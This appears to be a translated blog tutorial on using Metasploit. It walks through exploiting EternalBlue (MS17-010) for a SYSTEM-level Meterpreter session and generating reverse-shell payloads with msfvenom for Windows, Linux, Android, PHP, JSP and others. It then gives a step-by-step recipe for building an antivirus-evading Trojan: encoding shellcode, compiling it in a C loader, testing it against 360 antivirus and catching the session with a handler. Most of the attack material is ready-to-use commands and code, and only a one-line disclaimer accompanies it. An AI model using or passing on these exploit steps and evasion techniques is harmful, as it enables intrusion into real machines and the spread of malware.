How to use MSF

Time:2022-8-18

Public number: White hat left one

This article is only for technical discussion, and it is prohibited to use it in illegal ways

Introduction to MSF

Metasploit (MSF) is a free, downloadable framework that makes it easy to acquire, develop, and exploit computer software vulnerabilities. It comes with hundreds of known software vulnerabilities and is a professional-grade exploit tool.

When HD Moore released Metasploit in 2003, the state of computer security was also permanently changed, as if overnight, anyone could become a hacker. Because everyone can use MSF to attack unpatched or just patched vulnerabilities, as long as they know how to use MSF. Therefore, software vendors can no longer delay the release of patches for published vulnerabilities, because the Metasploit team has been working hard to develop various attack tools and contribute them to all Metasploit users.

Introduction to MSF Installation

MSF official website:https://www.metasploit.com/

There are two versions of MSF, Metaploit is open source and free, and Metaploit pro is charged for commercial use. Here we can use the free community version.

MSF download address:https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

MSF installation

(1) One-click installation

To install Metasploit on Linux/macOS, here are the official scripts that can be installed in one click

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall

(2) Manual installation

Note: If the above method is not feasible, you can also install manually

Debian/Ubuntu packages are located athttps://apt.metasploit.com, while the CentOS/Redhat/Fedora packages are located athttps://rpm.metasploit.com

ubuntu install
fromhttps://apt.metasploit.com/Download the deb installation package of MSF.
Run in terminal:dpkg -i metasploit-framework_6.0.7+20200916102431_1rapid7-1_amd64.deb
It has been installed, the database installation see the above steps

Centos installation
fromhttps://rpm.metasploit.comDownload the rpm installation package
Run in terminal:rpm-i metasploit-framework-6.0.7+20200916102441~1rapid7-1.el6.x86_64.rpm

The installation is complete

Install postgresql database

msf uses the postgresql database, if not, you need to install it first

When the database is installed, the system user postgres, the database user postgres, and the database postgres are automatically created.

1. apt-get install postgresql //Install the postgresql database

2. su - postgres //Switch to postgres user

3. psql //Log in to the postgresql database, there is no password for the first login

4. \password postgres //Modify the password of the database user postgres

msf update command:

sudo msfupdate

msf uses database

1. msfconsole //Start msf

2. db_connect postgres:[email protected]/test //Username, password, address, name made up at will.

3. db_status //View database connection status

Introduction to the functional modules of MSF

The functions used by MSF can be mainly divided into these modules, each module has its own functional area, forming the process of penetration testing

1. Auxiliary (auxiliary module)
Provides a large number of auxiliary module support for penetration testing information collection
2. Exploits (attack module)
A code component that exploits a discovered security vulnerability or configuration weakness to attack a remote target system to gain access to the remote target system.
3. Payload (attack load module)
A piece of implanted code that prompts the target to run after a successful attack
4. Post (post-penetration attack module)
Gather more information or gain further access to the exploited target system
5. Encoders (encoding module)
Encode attack payloads to bypass protection software

Basic usage of MSF

For example attacking EternalBlue:

Open the database:service postgresql start

Initialize the msf database:msfdb init

Enable MSF:msfconsole

Here we take the vulnerability of Eternal Blue for a simple use

First of all, we must ensure that the target machine can be accessed, then we first ping the target machine to see if the network is connected

It is connected

EternalBlue's bug number:ms17-010

Search by vulnerability name:search ms17_010

1. Use the auxiliary module to scan the target

Set up the module:use auxiliary/scanner/smb/smb_ms17_010

View settings:options

Set the destination address:set rhosts 192.168.174.129

The default target port is 445. If the Windows file sharing service is not open on port 445 with nmap port scanning, then it needs to be modified here.set rport target port

After setting it up,runorexploitattack

The green plus sign is attackable

2. Set the attack module to attack the target

Use the attack module:use exploit/windows/smb/ms17_010_eternalblue

Check out the required settings:options

Set the destination address:set RHOSTS 192.168.174.129

Set the destination port:set RPORT 445

Set up the payload:set payload windows/x64/meterpreter/reverse_tcp

Set the local address:set LHOST 192.168.174.192

attack:runorexploit

The attack is successful, the session is successfully obtained

Note: There is a certain probability that the target machine will be marked as a blue screen or restarted

View current permissions

System permissions, you can do whatever you want~

MSF backdoor generation module

Msfvenom common command parameters

  1. -l, --list
  2. # List all available items, where values ​​can be set to payloads, encoders, nops, platforms, archs, encrypt, formats, etc.
  3. -p, --payload
  4. # Specify a specific payload, if set to - , then read from the standard input stream
  5. --list-options
  6. # List standard, advanced and circumvention options for --payload
  7. -f, --format
  8. # Specify the output format of the payload (use --list formats to list)
  9. -e, --encoder
  10. # Specify the Encoder to use (list with --list encoders)
  11. --sec-name
  12. # New name to use when building large Windows binaries. Default: random 4 character string
  13. --smallest
  14. # Generate the smallest payload using all available encoders
  15. --encrypt
  16. # Encryption or encoding type to apply to shellcode (listed with --list encrypt)
  17. --encrypt-key
  18. # key used for encryption
  19. --encrypt-iv
  20. # encrypted initialization vector
  21. -a, --arch
  22. # Specify target system architecture (use --list archs to list)
  23. --platform
  24. # Specify target system platforms (use --list platforms to list)
  25. -o, --out
  26. # save the payload file
  27. -b, --bad-chars
  28. # Set characters that need to be avoided in Payload, such as: '\x00\xff'
  29. -n, --nopsled
  30. # Specify the number of nop in the payload
  31. -s, --space
  32. # Set the maximum length of unencoded payloads
  33. --encoder-space
  34. # Maximum length of the encoded payload
  35. -i, --iterations
  36. # Set the encoding times of Payload
  37. -c, --add-code
  38. # Specify to include an additional win32 shellcode file
  39. -x, --template
  40. # Specify a specific executable as a template
  41. -k, --keep
  42. # Protect the functionality of the template program, the injected payload runs as a new process
  43. -v, --var-name
  44. # Specify a variable name (when adding the -f parameter, such as -f python, the output is python code, the payload will be formatted as python code by line, and appended to a python variable, this parameter is the specified python variable variable name)
  45. -t, --timeout
  46. # Set the wait time to read the payload from STDIN (default is 30, 0 is disabled)
  47. -h, --help
  48. # help

msfvenom generates shellcode

normal generation

  1. msfvenom -p payload -f output format -o output file
  2. msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

code generation

  1. msfvenom -a system architecture --platform system platform -p payload lhost=attack machine IP lport=attack machine port -e encoding method -i encoding times -f output format -o output file
  2. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

msfvenom –list archs #View supported system architectures

  1. aarch64, armbe, armle, cbea, cbea64, cmd, dalvik, firefox, java, mips, mips64, mips64le, mipsbe, mipsle, nodejs, php, ppc, ppc64, ppc64le, ppce500v2, python, r, ruby, sparc, sparc64, tty, x64, x86, x86_64, zarch

msfvenom –list platforms #View supported system platforms

  1. aix, android, apple_ios, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, juniper, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, r, ruby, solaris, unifi, unix, unknown, windows

msfvenom -l payload #List all available payloads

msfvenom -l formats #List all output formats

msfvenom -l encrypt #List all encryption methods

msfvenom -l encoders #List all encoders

Common build formats

1、 Windows

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

2、Linux

msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

3、Mac

msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

4、Android

msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

5、Aspx

msfvenom --platform windows-p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

6、JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

7、PHP

msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php

8、BASH

msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

9、Python

msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py

How to avoid killing Trojans

Bypassing the free-killing Trojan is essentially changing his signature code, so to sum up, you can have

  1. coding
  2. Pack to avoid killing
  3. secondary compilation
  4. Separation to avoid killing: separation of ShellCode and loader

At present, the encoder features of msfvenom have basically entered the vulnerability library of anti-virus software, and it is difficult to achieve a single encoder encoding to bypass anti-virus software. Therefore, the shellcode is further modified and compiled into the mainstream of msf-free anti-kill. There are many on the Internet that use C, C#, python and other languages ​​to re-encode shellcode to achieve the effect of avoiding killing.

The first step: install the compiler software VC++6.0

Step 2: Generate a common Trojan horse

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.174.196 lport=1250 -f c

The third step, compile the c language into an exe file

  1. #include "stdafx.h"
  2. #include
  3. #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
  4. unsigned char buf[] =
  5. (The generated array is placed here)
  6. main()
  7. {
  8. ((void(*)(void))&buf)();
  9. }

Open vc6.0 and create a new program

Choose a simple win32 program

open a.app

Copy our code in

Compile it to see if there is a problem

Compile a.cpp again

If there is no problem, you can build a.exe, this file is the Trojan file we want

The fourth step, test whether it is successful

Copy the obtained a.exe to the desktop, right-click to use the 360 ​​Trojan cloud killing function to try it

successfully bypassed~

To test whether our Trojan is useful, open MSF to enable monitoring

  1. Enable monitoring: msf5 > use exploit/multi/handler
  2. Set the payload to be consistent with the generated Trojan: set payload windows/meterpreter/reverse_tcp
  3. Set the local address, consistent with the Trojan: set lhost 192.168.174.196
  4. Set the local port, consistent with the Trojan: set lport 1250

  1. msf5 exploit(multi/handler) > run

Successfully got the session, which proves that our Trojan is no problem~